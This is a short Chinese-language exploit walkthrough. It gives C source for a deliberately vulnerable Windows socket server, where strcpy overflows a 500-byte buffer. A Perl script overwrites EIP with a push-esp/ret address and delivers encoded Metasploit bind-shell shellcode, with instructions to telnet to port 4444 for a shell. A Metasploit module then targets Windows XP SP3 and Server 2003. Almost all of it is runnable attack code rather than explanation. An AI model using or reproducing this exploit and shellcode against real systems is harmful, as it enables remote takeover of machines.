例子是:
#include <iostream.h>
#include <winsock.h>
#include <windows.h>
#include <stdio.h>
//load windows socket
#pragma comment(lib, "wsoc k32.lib")
//Define Return Messages
#define SS_ERROR 1
#define SS_OK 0
void pr( char *str)
{
char buf[500]="";
strcpy(buf,str);
}
void sError(char *str)
{
MessageBox (NULL, str, "socket Error" ,MB_OK);
WSACleanup();
}
int main(int argc, char **argv)
{
WORD sockVersion; WSADATA wsaData;
int rVal;
char Message[5000]="";
char buf[2000]="";
u_short LocalPort;
LocalPort = 200;
//wsock32 initialized for usage
sockVersion = MAKEWORD(1,1);
WSAStartup(sockVersion, &wsaData);
//create server socket
SOCKET serverSocket = socket(AF_INET, SOCK_STREAM, 0);
if(serverSocket == INVALID_SOCKET)
{
sError("Failed socket()");
return SS_ERROR;
}
SOCKADDR_IN sin;
sin.sin_family = PF_INET;
sin.sin_port = htons(LocalPort);
sin.sin_addr.s_addr = INADDR_ANY;
//bind the socket
rVal = bind(serverSocket, (LPSOCKADDR)&sin, sizeof(sin));
if(rVal == SOCKET_ERROR)
{
sError("Failed bind()");
WSACleanup();
return SS_ERROR;
}
//get socket to listen
rVal = listen(serverSocket, 10);
if(rVal == SOCKET_ERROR)
{
sError("Failed listen()");
WSACleanup();
return SS_ERROR;
}
//wait for a client to connect
SOCKET clientSocket;
clientSocket = accept(serverSocket, NULL, NULL);
if(clientSocket == INVALID_SOCKET)
{
sError("Failed accept()");
WSACleanup();
return SS_ERROR;
}
int bytesRecv = SOCKET_ERROR;
while( bytesRecv == SOCKET_ERROR )
{
//receive the data that is being sent by the client max limit to 5000 bytes.
bytesRecv = recv( clientSocket, Message, 5000, 0 );
if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET )
{
printf( "\nConnection Closed.\n");
break;
}
}
//Pass the data received to the function pr
pr(Message);
//close client socket
closesocket(clientSocket);
//close server socket
closesocket(serverSocket);
WSACleanup();
return SS_OK;
}
典型的EIP 覆盖问题················
perl SOCKET 代码:
在CMD 中 perl 1.pl 服务器IP 服务器端口
use strict;
use Socket;
my $junk = "\x41"x504;
my $eip = pack('V',0x769A1594);#0x769A1594 push esp - ret
my $prejumk = "\x90"x46;
# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# LPORT=4444, RHOST=x.x.x.x, EXITFUNC=seh,
my $shellcode =
"\x31\xc9\xdb\xc3\xd9\x74\x24\xf4\xb8\xf3\x9a\xbc\x81\x5b" .
"\xb1\x56\x31\x43\x16\x03\x43\x16\x83\xc3\xf7\x78\x49\x7d" .
"\x1f\xf5\xb2\x7e\xdf\x66\x3a\x9b\xee\xb4\x58\xef\x42\x09" .
"\x2a\xbd\x6e\xe2\x7e\x56\xe5\x86\x56\x59\x4e\x2c\x81\x54" .
"\x4f\x80\x0d\x3a\x93\x82\xf1\x41\xc7\x64\xcb\x89\x1a\x64" .
"\x0c\xf7\xd4\x34\xc5\x73\x46\xa9\x62\xc1\x5a\xc8\xa4\x4d" .
"\xe2\xb2\xc1\x92\x96\x08\xcb\xc2\x06\x06\x83\xfa\x2d\x40" .
"\x34\xfa\xe2\x92\x08\xb5\x8f\x61\xfa\x44\x59\xb8\x03\x77" .
"\xa5\x17\x3a\xb7\x28\x69\x7a\x70\xd2\x1c\x70\x82\x6f\x27" .
"\x43\xf8\xab\xa2\x56\x5a\x38\x14\xb3\x5a\xed\xc3\x30\x50" .
"\x5a\x87\x1f\x75\x5d\x44\x14\x81\xd6\x6b\xfb\x03\xac\x4f" .
"\xdf\x48\x77\xf1\x46\x35\xd6\x0e\x98\x91\x87\xaa\xd2\x30" .
"\xdc\xcd\xb8\x5c\x11\xe0\x42\x9d\x3d\x73\x30\xaf\xe2\x2f" .
"\xde\x83\x6b\xf6\x19\xe3\x46\x4e\xb5\x1a\x68\xaf\x9f\xd8" .
"\x3c\xff\xb7\xc9\x3c\x94\x47\xf5\xe9\x3b\x18\x59\x41\xfc" .
"\xc8\x19\x31\x94\x02\x96\x6e\x84\x2c\x7c\x19\x82\xe2\xa4" .
"\x4a\x65\x07\x5b\x7d\x29\x8e\xbd\x17\xc1\xc6\x16\x8f\x23" .
"\x3d\xaf\x28\x5b\x17\x83\xe1\xcb\x2f\xcd\x35\xf3\xaf\xdb" .
"\x16\x58\x07\x8c\xec\xb2\x9c\xad\xf3\x9e\xb4\xa4\xcc\x49" .
"\x4e\xd9\x9f\xe8\x4f\xf0\x77\x88\xc2\x9f\x87\xc7\xfe\x37" .
"\xd0\x80\x31\x4e\xb4\x3c\x6b\xf8\xaa\xbc\xed\xc3\x6e\x1b" .
"\xce\xca\x6f\xee\x6a\xe9\x7f\x36\x72\xb5\x2b\xe6\x25\x63" .
"\x85\x40\x9c\xc5\x7f\x1b\x73\x8c\x17\xda\xbf\x0f\x61\xe3" .
"\x95\xf9\x8d\x52\x40\xbc\xb2\x5b\x04\x48\xcb\x81\xb4\xb7" .
"\x06\x02\xca\x46\x9a\x9f\x5b\xf1\x4f\xe2\x01\x02\xba\x21" .
"\x3c\x81\x4e\xda\xbb\x99\x3b\xdf\x80\x1d\xd0\xad\x99\xcb" .
"\xd6\x02\x99\xd9";
my $host = shift || 'localhost';
my $port = shift || 200;
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port,$iaddr);
socket(SOCKET,AF_INET,SOCK_STREAM,$proto) or die "socket: $!";
print "[+] Connecting to $host on port $port\n";
connect(SOCKET,$paddr) or die "connect: $!";
print "[+] Sending payload";
print SOCKET $junk.$eip.$prejumk.$shellcode."\n";
print "[+] Payload sent\n";
close SOCKET or die "cose: $!";执行完后
telnet 服务器IP 4444 即可得到shell
主要能看懂metasploit 就好了·········
C:\Program Files\Metasploit\Framework3\msf3\modules\exploits\windows\misc 创建文件 xxx.rb
require 'msf/core' class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Custom vulnerable server stack overflow',
'Description' => %q{
This module exploits a stack overflow in a
custom vulnerable server.
},
'Author' => [ 'Peter Van Eeckhoutte' ],
'Version' => '$Revision: 9999 $',
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1400,
'BadChars' => "\x00\xff",
},
'Platform' => 'win',
'Targets' =>
[
['Windows XP SP3 En', { 'Ret' => 0x7c874413, 'Offset' => 504 } ],
['Windows 2003 Server R2 SP2', { 'Ret' => 0x71c02b67, 'Offset' => 504 } ],
],
'DefaultTarget' => 0,
'Privileged' => false ))
register_options( [ Opt::RPORT(200) ], self.class)
end
def exploit
connect
junk = make_nops(target['Offset'])
sploit = junk + [target.ret].pack('V') + make_nops(50) + payload.encoded
sock.put(sploit)
handler
disconnect
end
end
